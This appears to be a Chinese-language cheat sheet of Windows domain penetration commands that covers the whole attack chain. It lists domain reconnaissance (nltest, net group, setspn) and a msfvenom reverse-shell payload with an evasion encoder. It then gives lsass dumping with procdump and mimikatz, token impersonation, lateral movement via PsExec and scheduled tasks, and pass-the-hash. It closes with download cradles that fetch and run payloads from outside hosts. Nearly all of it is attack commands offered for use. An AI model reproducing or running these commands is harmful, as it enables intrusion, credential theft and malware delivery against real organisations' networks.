域信息收集-nltest信任域
信任域:可以在工作组里查询,查询内网里是否有域环境
nltest /domain_trusts /all_trusts /v /server:192.168.52.2
返回所有信任192.168.2.252的域。
nltest /dsgetdc:XXXXX /server:192.168.52.2
返回域控和其相应的IP地址,XXXXX是上步骤结果中的一个域
eg:
nltest的命令:
https://www.cnblogs.com/dreamer-fish/p/3473895.html
csvde的命令-----导出域用户信息
csvde -setspn hack -f c:windows emphack.csv
setspn的命令
setspn -T hack -Q */* | findstr IIS
setspn -T hack -Q */* | findstr MSSQL
dnsdump的命令
dnsdump.exe -u 域名域用户 -p 域密码 域控机器名
dnsdump.exe -u hackiis_user -p 1qaz@WSX windows_server_2016_dc -r
net的命令
net user/domain 获取域用户列表
net group "domain admins" /domain 获取域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net group "domain computers" /domain 查看域机器
net group /domain 查询域里面的组
net view 查看同一域内机器列表
net view \ip 查看某IP共享
net view \GHQ 查看GHQ计算机的共享资源列表
net view /domain 查看内网存在多少个域
net view /domain:XYZ 查看XYZ域中的机器列表
nbtscan的命令
nbtscan.exe 192.168.52.0/24
域渗透思路
横向渗透->权限维持->取密码(获取一个域用户账号密码) ->域信息收集 ->横向渗透 ->去面膜 ->获取域管权限 ->拿下域控服务器
横向渗透
使用弱口令密码工具,整体操作在截图文件中
权限维持
dll加载shellcode免杀上线
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=9999 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f c -o shellcode.c
use exploit/multti/handler
set payload windows/meterpreter/reverse_tcp_uuid
set lhost 192.168.1.1
set lport 8888
set EnableStageEncoding true
set StageEncoder x86/fnstenv_mov
exploit
lsass读取内存hash
lsass进程获取内存hash
//在目标机子执行procdump.exe
procdump.exe -accepteula -ma isass.exe c:windows empisass.dmp
//在mimikatz中运行,结果保存在日志里
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
LaZagne取各种链接工具密码,浏览器保存密码
https://github.com/AlessandroZ/LaZagne
凭证窃取
通过tasklist /v查看进程用户,如果有域用户启的进程,则凭证窃取
incognito.exe list_tokens -u
incognito.exe execute -c "HACKAdministrator" cmd.exe
命令行渗透
下载上传命令
net use \192.168.52.2 /u:hackadministrator Windows2019*** 建立IPC连接
net use \192.168.52.2 /de /y 删除IPC连接
copy sbn.exe \192.168.52.2C$windows emp 复制本地文件打目标服务器
copy \192.168.52.2C$windows emphash.txt 复制目标服务器文件到本地
执行命令
schtasks(计划任务)
schtasks /create/tn task1 /U 域域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /S 域机子IP /RU system
schtasks /run /tn task1 /s 域机子IP /U 域域用户 /P 域用户密码
schtasks /F /delete /tn task1 /s 域机子IP /U 域域用户 /P 域用户密码
psexec
net use \192.168.52 /u:hackadministrator Windows2019***
PsExec.exe \192.168.52.2 -s cmd.exe -accepteula
-accepteula第一次运行会弹框,输入这个参数便不会弹框
-s以“nt authoritysystem”权限运行远程进程
hash传递
psexec.exe -hashes:用户Hash 域名/用户名@目标IP
psexec.exe -hashes:70a50725f6d2d03d00c24e946fde3 hack/administrator@192.168.52.2
命令行下载文件
1.powershell(win2003、winXP不支持)
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.101/test.txt','c: est.txt')
2.Certutil
certutil.exe -urlcache -split -f http://192.168.1.1/test.txt file.txt
3.bitadmin
bitadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:file est.txt
bitadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:file est.txt
4.msiexec
msiexec /q /i http://192.168.1.1/test.txt
5.IEExec
caspol -s off
IEExec.exe http://192.168.1.1/test.exe